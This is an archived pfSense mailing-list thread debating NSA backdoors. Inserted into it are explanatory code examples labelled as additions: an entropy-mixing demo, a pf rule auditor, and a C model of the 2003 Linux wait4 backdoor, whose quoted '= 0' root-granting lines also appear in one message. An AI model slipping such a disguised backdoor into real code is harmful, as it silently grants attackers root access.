> 2. Routers/Gateways/Firewalls are highly interesting for big brother. Read e.g. this article "NSA Laughs at PCs, Prefers Hacking Routers and Switches" (https://mailman.stanford.edu/pipermail/liberationtech/2013-September/011287.html)
>
> So, combining those 2 facts - the fact that the NSA/FBI/etc. prefer to infiltrate routers with the fact that they very well bother knocking the doors of small businesses with niche products, I guess my question is quite legitimate!
>
> Greetings
> Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 10/9/2013 11:32 AM, Robert Guerra wrote:

> From the news i've read... a couple of questions for the pfsense developers come to mind:
>
> 1. Random Number generation - NSA is reported to have weakened several random number generators and/or introduced vulnerabilities. - What is used in PFsense?

We use the RNG from FreeBSD, which can be assisted by hardware, assuming you trust the hardware.

http://en.wikipedia.org/wiki//dev/random#FreeBSD

> 2. Crypto - Certain protocols have been deliberately weakened, have options that turn on crypto and/or known to contain backdoors. - a robust discussion on how to enable the highest standard of encryption and privacy protective options would be most welcome

That is still something that is up for debate. I'm not sure anyone has really accurately identified which are good and which might be compromised from a cryptographic standpoint with high confidence. There are some standards that have been called into question simply because the NSA/DOD/etc recommend them. Are they recommending them because they are strong, or because they have been compromised and they want people to use them?

http://www.nsa.gov/business/programs/elliptic_curve.shtml
http://en.wikipedia.org/wiki/NSA_Suite_B
http://en.wikipedia.org/wiki/Elliptic_curve_cryptography#NIST-recommended_elliptic_curves

If compromised ciphers could be positively identified, we could actively discourage their use or disable them as needed. The problem with doing that is compatibility and inertia. PPTP has been broken 100%, but people still use it because they don't want to change, management won't let them change, they have a crazy use case for it, or simply because they don't care. We have placed a large red warning on PPTP for the last few versions and people still keep using it, knowing it's not much better than transmitting in the clear.

Jim
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 19:03, Jim Thompson wrote:

> (TIC mode: on)

Sorry, but I guess the whole matter - not only concerning pfSense, but the current threat to our civilization by our criminal governments as a whole - is much too serious for any TIC-modes..
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
The big problem with asking the question "Has the NSA required you to add a back door?" is that no small company that wants to stay in business can or will say yes (If they do, no one will trust/use the product unless forced themselves). The company will agree/be forced to say no. How does one tell that no from an authentic no? Therefore, once trust is questioned, the only way to be sure is to do the self review suggested earlier... However, from my perspective, the code in pfSense is more likely to be secure than any commercial, closed source solution. See prior threads about FreeBSD security.

Walter

On Wed, Oct 9, 2013 at 9:10 AM, Thinker Rix thinke...@rocketmail.com wrote:

> On 2013-10-09 19:03, Jim Thompson wrote:
>> (TIC mode: on)
> Sorry, but I guess the whole matter - not only concerning pfSense, but the current threat to our civilization by our criminal governments as a whole - is much too serious for any TIC-modes..

--
The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well-meaning but without understanding. -- Justice Louis D. Brandeis
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 09, 2013 at 12:10:00PM -0400, Jim Pingle wrote:

> On 10/9/2013 11:32 AM, Robert Guerra wrote:
>> From the news i've read... a couple of questions for the pfsense developers come to mind:
>>
>> 1. Random Number generation - NSA is reported to have weakened several random number generators and/or introduced vulnerabilities. - What is used in PFsense?
> We use the RNG from FreeBSD, which can be assisted by hardware, assuming you trust the hardware.
>
> http://en.wikipedia.org/wiki//dev/random#FreeBSD

I've come across that when researching making one-time pads on pfSense, using a hardware RNG. Is there a way to have a hardware RNG (multiple, if present, e.g. AMD Geode and HiFn in an ALIX) mix in entropy into Yarrow, instead of overriding it? The latter behavior is definitely not what I want.
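The difference between a hardware RNG overriding the software generator and being mixed into it, as asked about in the message above, shown as an added example that is not from the thread and is not FreeBSD's Yarrow implementation. A SHA-256 pool stands in for the generator; the predictable "hardware" source, the sample values and all function names are constructed assumptions.

```python
import hashlib


class EntropyPool:
    """Hash-based pool: every sample from every source is folded into the state."""

    def __init__(self):
        self._state = bytes(32)

    def mix(self, source: str, sample: bytes) -> None:
        h = hashlib.sha256()
        h.update(self._state)
        # Length-prefix each field so ("ab", b"c") and ("a", b"bc") cannot collide.
        for field in (source.encode(), sample):
            h.update(len(field).to_bytes(4, "big") + field)
        self._state = h.digest()

    def read(self, nbytes: int) -> bytes:
        out = b""
        counter = 0
        while len(out) < nbytes:
            block = self._state + b"out" + counter.to_bytes(4, "big")
            out += hashlib.sha256(block).digest()
            counter += 1
        # Ratchet the state so this output cannot be recomputed from a later state.
        self._state = hashlib.sha256(self._state + b"next").digest()
        return out[:nbytes]


def predictable_hw_rng(nbytes: int) -> bytes:
    """Constructed stand-in for a hardware RNG whose output an attacker can predict."""
    return hashlib.sha256(b"attacker-known seed").digest()[:nbytes]


def key_override(software_samples) -> bytes:
    """Override design: hardware output is used directly, software samples are ignored."""
    return predictable_hw_rng(16)


def key_mixed(software_samples) -> bytes:
    """Mixing design: hardware output is only one input among several."""
    pool = EntropyPool()
    pool.mix("hwrng", predictable_hw_rng(32))
    for sample in software_samples:
        pool.mix("interrupt-timing", sample)
    return pool.read(16)


if __name__ == "__main__":
    # Two hosts with different (constructed) software timing samples.
    host_a, host_b = [b"\x13\x9a\x40"], [b"\x13\x9a\x41"]
    print("override:", key_override(host_a).hex(), key_override(host_b).hex())
    print("mixed:   ", key_mixed(host_a).hex(), key_mixed(host_b).hex())
```

With the override design both hosts produce the key the attacker already knows; with mixing, predicting the key also requires the software samples, so a bad hardware source cannot make the result worse than the software sources alone.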
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 6:38 PM, Thinker Rix thinke...@rocketmail.com wrote:

> My main question was not if the code includes bad things, but if the company behind pfSense has been approached (yet) by authorities to comply with their Orwellian global police state phantasy.

already answered. Twice.
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Argh. Anyone who answered Yes to your question (correctly, mind you) would immediately be committing a federal crime. Considering the consequences, no-one in their right mind would ever confirm that they had been approached or received a NSL. Which makes asking the question quite irrelevant.

-Adam

Thinker Rix thinke...@rocketmail.com wrote:
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 9, 2013 at 10:38 AM, Jim Thompson j...@netgate.com wrote:

> So asking the question is stupid(*), because a lie is indistinguishable from the truth.

I disagree on that point. Even if one is sure to get a no answer, regardless of the truth, it is still useful to ask the question for at least two reasons I can think of:

1. To get the response on record. The responders can be held accountable should it ever come out they knowingly lied.

2. To examine the response for credibility. A simple yes or no answer might not yield much, but such is rarely the case. If the answer is delayed, unclear, couched in a bunch of rhetoric or handwaving, delayed or avoided, then any or all of these things will be taken into account by those asking the question or observing the response. This is a principle that is understood by courts of law, psychologists, interrogators, and people of intuition.

db
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Linus Torvalds was asked the same question in a Q&A session about linux. He said 'no' while nodding his head up and down.

Sent via BlackBerry from T-Mobile

-Original Message-
From: David Burgess apt@gmail.com
Sender: list-bounces@lists.pfsense.org
Date: Wed, 9 Oct 2013 10:46:10
To: pfSense support and discussion list@lists.pfsense.org
Reply-To: pfSense support and discussion list@lists.pfsense.org
Subject: Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 09, 2013 at 11:42:31AM -0500, Adam Thompson wrote:

> Argh. Anyone who answered Yes to your question (correctly, mind you) would immediately be committing a federal crime.

All assuming the company in question resides in the US, or has significant presence in the US. There is, of course, considerable strong-arming and informal co-operation going on behind the scenes, so geography is not exactly a good protection. I've personally given up on any commercial software, and moved to purely community-built tools, and will take considerable protection now that we know that Ft. Meade is in the business of hacking end users and companies.

> Considering the consequences, no-one in their right mind would ever confirm that they had been approached or received a NSL. Which makes asking the question quite irrelevant.

The question is useful, since it produced this thread. As I suggested, if you're not trusting pfSense, you can always manually verify the rules generated by it, and load it into a pf-speaking device you consider trustable.
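The verification suggested in the message above (checking the generated pf rules before loading them on another pf host) can be partly automated. This is an added example, not part of the original thread and not pfSense's own code: it compares a ruleset against a hand-written policy, and the sample ruleset, the `APPROVED` list, the addresses and all function names are constructed assumptions.

```python
import re

# Constructed sample ruleset (not exported from a real firewall).
SAMPLE_RULESET = r'''
wan = "em0"
set skip on lo0
block drop in log all label "default deny"   # comment after a rule
pass in quick on $wan inet proto tcp from any to 192.0.2.10 port 443 \
    flags S/SA keep state label "USER_RULE: https #1"
pass in quick on $wan inet proto tcp from 198.51.100.0/24 to any port 22 keep state
pass out all keep state
pass in quick on $wan from any to any
'''

# The policy the administrator intended, written out by hand (assumption).
APPROVED = [
    "pass in quick on em0 inet proto tcp from any to 192.0.2.10 port 443 flags S/SA keep state",
    "pass in quick on em0 inet proto tcp from 198.51.100.0/24 to any port 22 keep state",
    "pass out from any to any keep state",
]

_QUOTED_OR_COMMENT = re.compile(r'"[^"]*"|#.*')
_MACRO_DEF = re.compile(r'^(\w+)\s*=\s*"([^"]*)"$')


def logical_rules(text):
    """Yield rules with continuations joined, comments removed and macros expanded."""
    macros = {}
    for line in re.sub(r"\\\n", " ", text).splitlines():
        # Drop '#' comments, but keep a '#' that sits inside a quoted string.
        line = _QUOTED_OR_COMMENT.sub(
            lambda m: m.group(0) if m.group(0).startswith('"') else "", line
        ).strip()
        if not line:
            continue
        definition = _MACRO_DEF.match(line)
        if definition:
            macros[definition.group(1)] = definition.group(2)
            continue
        yield re.sub(r"\$(\w+)", lambda m: macros.get(m.group(1), m.group(0)), line)


def normalise(rule):
    """Reduce a rule to a canonical form so that equivalent spellings compare equal."""
    rule = re.sub(r'\blabel\s+"[^"]*"', "", rule)       # labels do not affect filtering
    rule = re.sub(r"\ball\b", "from any to any", rule)  # 'all' is pf shorthand
    return " ".join(rule.split())


def audit(ruleset, approved):
    """Return (reason, rule) findings for pass rules that deviate from the policy."""
    reviewed = {normalise(r) for r in approved}
    seen, findings = set(), []
    for rule in map(normalise, logical_rules(ruleset)):
        if not rule.startswith("pass "):
            continue
        seen.add(rule)
        if rule not in reviewed:
            findings.append(("not in reviewed policy", rule))
        # A pass rule without 'out' also matches inbound traffic.
        if (not rule.startswith("pass out ") and "from any to any" in rule
                and " port " not in rule):
            findings.append(("inbound any-to-any with no port restriction", rule))
    findings += [("reviewed rule missing from ruleset", r) for r in sorted(reviewed - seen)]
    return findings


if __name__ == "__main__":
    for reason, rule in audit(SAMPLE_RULESET, APPROVED):
        print(f"{reason}: {rule}")
```

The comparison is textual after normalisation, so it catches added, removed or widened pass rules but does not evaluate rule ordering or `quick` semantics; those still need a manual read.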
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 09, 2013 at 06:50:53PM +0200, Jim Thompson wrote:

> IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego.

Sorry, this is not BS. The situation has changed, and we have to adapt.

> It doesn’t contribute anything to the project.

It clarifies a few things. Please don't knee-jerk about it, this is not going to improve things in any way.
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 6:46 PM, David Burgess apt@gmail.com wrote:

> On Wed, Oct 9, 2013 at 10:38 AM, Jim Thompson j...@netgate.com wrote:
>> So asking the question is stupid(*), because a lie is indistinguishable from the truth.
> I disagree on that point. Even if one is sure to get a no answer, regardless of the truth, it is still useful to ask the question for at least two reasons I can think of:
>
> 1. To get the response on record. The responders can be held accountable should it ever come out they knowingly lied.
>
> 2. To examine the response for credibility. A simple yes or no answer might not yield much, but such is rarely the case. If the answer is delayed, unclear, couched in a bunch of rhetoric or handwaving, delayed or avoided, then any or all of these things will be taken into account by those asking the question or observing the response. This is a principle that is understood by courts of law, psychologists, interrogators, and people of intuition.

IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. It doesn’t contribute anything to the project.
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Hi Jim, thank you for your quick reply!

On 2013-10-09 18:59, Jim Pingle wrote:

> On 10/9/2013 11:20 AM, Paul Kunicki wrote:
>> I think that in light of the recent news of the NSA coercing various organizations to provide them with means to eavesdrop this message has merit and deserves response although I doubt the NSA really needs cooperation from these guys. Does anyone else care to comment ?
> As far as I'm aware, nobody has contacted us, but if they did I may not know. They aren't really interested in end-user firewalls, they want infrastructure routers.

Do you think that there might be a chance to get an official statement of ESF, maybe without any ifs and buts? This would really help in these uncertain times that we all have to suffer currently.

Thank you,
Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Hello Jim! Thank you for your answer.

On 2013-10-09 19:38, Jim Thompson wrote:

> No, the NSA hasn't approached us about pfSense, or adding a back door, or anything similar. Nor has anyone else.

Do you work for Electric Sheep Fencing LLC, i.e. is this the official answer of the company to my question?

Thank you
Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
About that made in the USA thing, the NSA has deals with overseas companies as well... Plus, the GCHQ and several other foreign spy agencies have done similar things, so if you start asking, you discover that the major governments are trying to do this and have succeeded more often than we would like.

Also, the whole "We have to ask to ask the question to get the denial on record" only matters for the government or people with lots of money. The Government can sue you/arrest you for a lie, but do you have enough money to pay for lawsuits against a company? Most lawyers want money upfront unless you have clear suit against a company with lots of money. When was the last (or even first time) that a company was sued and lost to a private party for something like this, outside of class action lawsuits?

Walter

On Wed, Oct 9, 2013 at 9:51 AM, Eugen Leitl eu...@leitl.org wrote:

> On Wed, Oct 09, 2013 at 11:42:31AM -0500, Adam Thompson wrote:
>> Argh. Anyone who answered Yes to your question (correctly, mind you) would immediately be committing a federal crime.
> All assuming the company in question resides in the US, or has significant presence in the US. There is, of course, considerable strong-arming and informal co-operation going on behind the scenes, so geography is not exactly a good protection. I've personally given up on any commercial software, and moved to purely community-built tools, and will take considerable protection now that we know that Ft. Meade is in the business of hacking end users and companies.
>> Considering the consequences, no-one in their right mind would ever confirm that they had been approached or received a NSL. Which makes asking the question quite irrelevant.
> The question is useful, since it produced this thread. As I suggested, if you're not trusting pfSense, you can always manually verify the rules generated by it, and load it into a pf-speaking device you consider trustable.

--
The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well-meaning but without understanding. -- Justice Louis D. Brandeis
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
> I also understand your point though, since the software is OSS, it should be fairly easy to check for backdoors :)

Yes, you *could* check. But does anybody? Check the *entire* code and get the big picture? Realistically speaking, that wouldn't be enough anyways. What is the percentage of pfSense users that download source and build it themselves vs. download the prebuilt binary?

Regards,
-Jeppe
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Some people in this discussion assume that the principals of ESF could not be forced to lie by the US government, under threat of lawsuits, financial ruin, incarceration and not seeing their children grow up. I find this assumption awfully naive. I think it's unlikely that ESF was even asked to cooperate, but I don't believe a denial is all that useful under the circumstances, and asking for it again and again is obnoxious.

Gé

On Wed, Oct 9, 2013 at 10:07 AM, Jeppe Øland jol...@gmail.com wrote:

>> I also understand your point though, since the software is OSS, it should be fairly easy to check for backdoors :)
> Yes, you *could* check. But does anybody? Check the *entire* code and get the big picture? Realistically speaking, that wouldn't be enough anyways. What is the percentage of pfSense users that download source and build it themselves vs. download the prebuilt binary?
>
> Regards,
> -Jeppe

--
Gé
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 6:56 PM, Eugen Leitl eu...@leitl.org wrote: On Wed, Oct 09, 2013 at 06:50:53PM +0200, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. Sorry, this is not BS. The situation has changed, and we have to adapt. The situation did not change with the Snowden revelations. Anyone following along has known what was going on for at least the last decade. The only thing that has changed is that now outrage has become popular. The New York Times’ James Risen and Laura Poitras penned an article a couple weeks ago titled ‘NSA Gathers Data on Social Connections of U.S. Citizens” in which they make the claims based on documents leaked by “Edward Snowden”. “… the National Security Agency has been exploiting its huge collections of data to create sophisticated graphs of some Americans’ social connections that can identify their associates, their locations at certain times, their traveling companions and other personal information, according to newly disclosed documents and interviews with officials… … according to documents provided by Edward J. Snowden… … The new disclosures add to the growing body of knowledge in recent months about the N.S.A.’s access to and use of private information concerning Americans” New York Times See: http://www.nytimes.com/2013/09/29/us/nsa-examines-social-networks-of-us-citizens.html?pagewanted=all William E. Binney (perhaps you should google him) was speaking directly to Laura Poitras when he said these words slightly over a year ago: “The purpose is to be able to monitor what people are doing. You build social networks for everybody that then turns into the graph then you index all that data to the graph which means you can then pull out a “community” with an outline of the life of everyone in the community. And if you carried it over time from 2001 up you have 10 years of their life you can lay out in a timeline. That involves anybody in the country” William E. 
Binney, Aug. 2012, speaking to Laura Poitras in HER documentary The Program http://www.nytimes.com/2012/08/23/opinion/the-national-security-agencys-domestic-spying-program.html?_r=0 Do you think she forgot this interview while she was writing an article in the New York Times last month that she was told this “groundbreaking” revelation long ago? Because she never mentions Binney in her new article. Why? Seriously, ask yourself why. She also doesn’t mention key things like “Stellar Wind” or NarusInsight. These are real programs. For all we know, Pyramid is nothing more than a Powerpoint deck created for a psyop purposes. Maybe it’s real, and maybe this is all a smokescreen for something else. How many of you people now questioning pfSense understand that Edward Snowden despised classified leaks in back in 2009, and that he was not always the champion of transparency that he has apparently become. ArsTechnica published IRC chats where he railed against a New York Times story about the U.S. rejecting an Israeli request for aid to attack an Iranian nuclear site and the United States' covert efforts to sabotage Iran's nuclear program. Are they TRYING to start a war? Jesus christ. they're like wikileaks, he said in the chat. they're just reporting, dude, said another user. moreover, who the fuck are the anonymous sources telling them this? he said. those people should be shot in the balls. Snowden, in the chat, also criticized reporting on classified information: is it unethical to report on the government's intrigue? asked a user in the chat. VIOLATING NATIONAL SECURITY? no. he responded. meh. national security. responded the user. Um, YS.that shit is classified for a reason, he said. it's not because oh we hope our citizens don't find out. it's because this shit won't work if iran knows what we're doing. I am so angry right now. This is completely unbelievable, Snowden said. 
http://arstechnica.com/tech-policy/2013/06/exclusive-in-2009-ed-snowden-said-leakers-should-be-shot-then-he-became-one/3/ It doesn’t contribute anything to the project. It clarifies a few things. Please don't knee-jerk about it, this is not going to improve things in any way. So “be a pussy” is your answer to handle this? jim
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:03 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! Thank you for your answer. On 2013-10-09 19:38, Jim Thompson wrote: No, the NSA hasn’t approached us about pfSense, or adding a “back door”, or anything similar. Nor has anyone else. Do you work for Electric Sheep Fencing LLC, i.e. is this the official answer of the company to my question? There are three individuals that own ESF, and can speak for the company. Chris Buechler Jamie Thompson (my wife) Me. how official do you want an answer to be?
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Hi Adam, On 2013-10-09 19:42, Adam Thompson wrote: Which makes asking the question quite irrelevant. I do not think so. Greetings Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:13 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! On 2013-10-09 19:50, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. This is already the second time that you insult me indirectly. It’s amusing that you don’t understand that you threw the first stone here. May I ask again if you are a staff member of Electric Sheep Fencing LLC? Staff members get paid. I’m a co-owner, and have never taken a dime from ESF (or BSDP). jim
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 20:04, Walter Parker wrote: About that made in the USA thing, the NSA has deals with overseas companies as well... Plus, the GCHQ and several other foreign spy agency's have done similar things, so if you starting asking, you discover that the major governments are trying to do this and have succeed more often than we would like. Yes, it is horrifying. Also, the whole We have to ask to ask the question to get the denial on record only matters for the government or people with lots of money. The Government can sue you/arrest you for a lie, but do you have enough money to pay for lawsuits against a company? Most lawyers want money upfront unless you have clear suit against a company with lots of money. When was the last (or even first time) that a company was sued and lost to a private party for something like this, outside of class action lawsuits I do not want to sue or otherwise harm anybody. I only asked a very simple question and now read the answers. Very interesting answers, I think. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 17:20, Thinker Rix wrote: Dear pfsense-team, I want to ask if you have been approached by any US government officials, such as NSA, FBI, etc. and been asked/ forced to include any backdoors, spyware, loggers, etc. into pfsense and if you did so. Hello all! Thank you for all your reactions so far! Reading the whole thread, I can't help but feel two things: 1. Quite a bit of aggression of some users. Why? Because I asked a simple and naively straight-forward question? Strange, isn't it? 2. A nothing to worry here, just continue walking attitude of some others I think this is strange. And by the way: It is not only some question, but *the* question, actually, if someone remembers what we are talking about here! We are talking about a network security software - so what on earth is more normal than asking if this software *is* secure!? Should we all just look away and continue our business as usual, as if nothing has happened the last year out there on the globe? We all know that the governments currently force on a daily base one company after the other to comply to their New World Order-Orwellian-global-surveillance phantasies and make them compromise their software or service. So I find it absolutely NECESSARY to clear out if pfSense has fallen (already) to them, or not. Network security is THE major reason for using pfSense. So it should be the most important question for all of us, isn't it? By my comprehension, everyone who says that this is a silly question or that it is some unimportant thought no one should further bother thinking about in detail, is either confused, or trying to conceal something. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:36 PM, Thinker Rix thinke...@rocketmail.com wrote: On 2013-10-09 20:04, Walter Parker wrote: About that made in the USA thing, the NSA has deals with overseas companies as well... Plus, the GCHQ and several other foreign spy agency's have done similar things, so if you starting asking, you discover that the major governments are trying to do this and have succeed more often than we would like. Yes, it is horrifying. Also, the whole We have to ask to ask the question to get the denial on record only matters for the government or people with lots of money. The Government can sue you/arrest you for a lie, but do you have enough money to pay for lawsuits against a company? Most lawyers want money upfront unless you have clear suit against a company with lots of money. When was the last (or even first time) that a company was sued and lost to a private party for something like this, outside of class action lawsuits I do not want to sue or otherwise harm anybody. I only asked a very simple question and now read the answers. Very interesting answers, I think. Not interesting, just simple ego stroking. As for those who want to read the source to find bugs … Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval. But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy. But on Nov. 
5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change. What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
            retval = -EINVAL;

[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.] A casual reading by anyone less than expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful (and somewhat) expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero. Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor. This is a very clever piece of work.
It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up. Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know. We still don’t have a report on the kernel.org hack of 2011. Why not? Many people say, calm down, it’s git, they can’t have inserted backdoors etc. without messing up the git history/changelog/hashes/whatever. But what if git was modified and backdoored previously to hide some objects/changes? How would such an attack work? Let’s say you discover a problem in git, which allows you to omit changesets in its output. How would that work to backdoor the kernel? Older versions of git would tell you the hashes were wrong. Implementations of git in other languages would tell you the hashes were wrong. Manually checking would tell
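The effect of the two wait4 lines quoted in the message above can be reproduced in user space. The following C model is an added example, not part of the original message or of the kernel source; the `task` struct, the `MODEL_*` flag constants (assumed values) and the `assignment_in_if` review heuristic are names introduced here for illustration.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Stand-ins for the kernel's __WCLONE and __WALL option bits (assumed values). */
#define MODEL_WCLONE 0x80000000u
#define MODEL_WALL   0x40000000u

struct task { unsigned int uid; };            /* models current->uid only */
struct outcome { int retval; unsigned int uid_after; };

/* The check as quoted in the message: '=' assigns 0 to the uid. */
int check_tampered(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (MODEL_WCLONE | MODEL_WALL)) && (current->uid = 0))
        retval = -EINVAL;   /* never reached: the assignment evaluates to 0 */
    return retval;
}

/* What the check appears to say on a casual read: '==' only compares. */
int check_as_read(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (MODEL_WCLONE | MODEL_WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Run one variant against a fresh task and report what changed. */
struct outcome run(int tampered, unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    struct outcome o;
    o.retval = tampered ? check_tampered(&t, options)
                        : check_as_read(&t, options);
    o.uid_after = t.uid;
    return o;
}

/* Review heuristic: return 1 if an if-condition in src contains a plain
 * assignment. It ignores strings and comments, so treat hits as leads. */
int assignment_in_if(const char *src)
{
    for (const char *p = strstr(src, "if"); p; p = strstr(p + 2, "if")) {
        if (p > src && (isalnum((unsigned char)p[-1]) || p[-1] == '_'))
            continue;                          /* tail of a longer identifier */
        const char *q = p + 2;
        while (isspace((unsigned char)*q))
            q++;
        if (*q != '(')
            continue;
        int depth = 0;
        for (; *q; q++) {
            if (*q == '(') {
                depth++;
            } else if (*q == ')') {
                if (--depth == 0)
                    break;
            } else if (*q == '=' && q[1] != '=' &&
                       !strchr("=!<>+-*/%&|^", q[-1])) {
                return 1;
            }
        }
    }
    return 0;
}

int main(void)
{
    const unsigned int both = MODEL_WCLONE | MODEL_WALL;
    struct outcome a = run(1, 1000, both);
    struct outcome b = run(0, 1000, both);
    printf("tampered: retval=%d uid_after=%u\n", a.retval, a.uid_after);
    printf("as read : retval=%d uid_after=%u\n", b.retval, b.uid_after);
    printf("flagged : %d\n", assignment_in_if(
        "if ((options == (__WCLONE|__WALL)) && (current->uid = 0))"));
    return 0;
}
```

In the tampered variant the error path is never taken, because the assignment expression itself evaluates to 0; the only observable effect is the changed uid. The extra parentheses around the assignment are also the form that GCC and Clang accept without their assignment-in-condition warning, which is why a textual review check is still useful.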
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 20:16, Gé Weijers wrote: Some people in this discussion assume that the principals of ESF could not be forced to lie by the US government, under threat of lawsuits, financial ruin, incarceration and not seeing their children grow up. Gee, quite a frightening regime. Someone should tell the USA to send some of their troops in there to remove this suppressing regime and free those poor devils over there by spreading some of their democracy, as they do all over the planet.. Ops, I think I got something wrong here ;-) I find this assumption awfully naive Do you thinks so? Me, not, though it might seem so at first sight. I think it's unlikely that ESF was even asked to cooperate, Interesting thought, may I ask you why you think so? but I don't believe a denial is all that useful under the circumstances What do you mean? It would not be useful not to comply, but better to just compromise that what you do so that you are left in peace? and asking for it again and again Actually I only asked once is obnoxious. Since when can a naive question, as you called it, be obnoxious? And why do you think asking a security software project if it is secure is obnoxious? I think it is the most important question of all. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 20:22, Jim Thompson wrote: On Oct 9, 2013, at 7:13 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! On 2013-10-09 19:50, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. This is already the second time that you insult me indirectly. It’s amusing that you don’t understand that you threw the first stone here. This is correct. I do not understand where I am supposed to have thrown any stones or insult anybody, indeed. If you would like to show me, I would really be thankful. May I ask again if you are a staff member of Electric Sheep Fencing LLC? Staff members get paid. I’m a co-owner, and have never taken a dime from ESF (or BSDP). jim Thank you for the info. Regards Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 19:49, Christian Borchert wrote: Linus Torvalds was asked the same question in a QA session about linux. He said 'no' while nodding his head up and down. Sent via BlackBerry from T-Mobile Exactly. Frightening, isn't it? Awkwardly the audience started laughing about that... Regards Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 20:18, Jim Thompson wrote: On Oct 9, 2013, at 7:03 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! Thank you for your answer. On 2013-10-09 19:38, Jim Thompson wrote: No, the NSA hasn’t approached us about pfSense, or adding a “back door”, or anything similar. Nor has anyone else. Do you work for Electric Sheep Fencing LLC, i.e. is this the official answer of the company to my question? There are three individuals that own ESF, and can speak for the company. Chris Buechler Jamie Thompson (my wife) Me. Thank you for this information. how official do you want an answer to be? Since you are a co-owner of ESF who is entitled to speak for the company, as you say, I believe that your answer is as official as it gets and I am thankful for this clear statement of yours! Thank you very much. I only wonder what the aggression was needed for. Regards Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
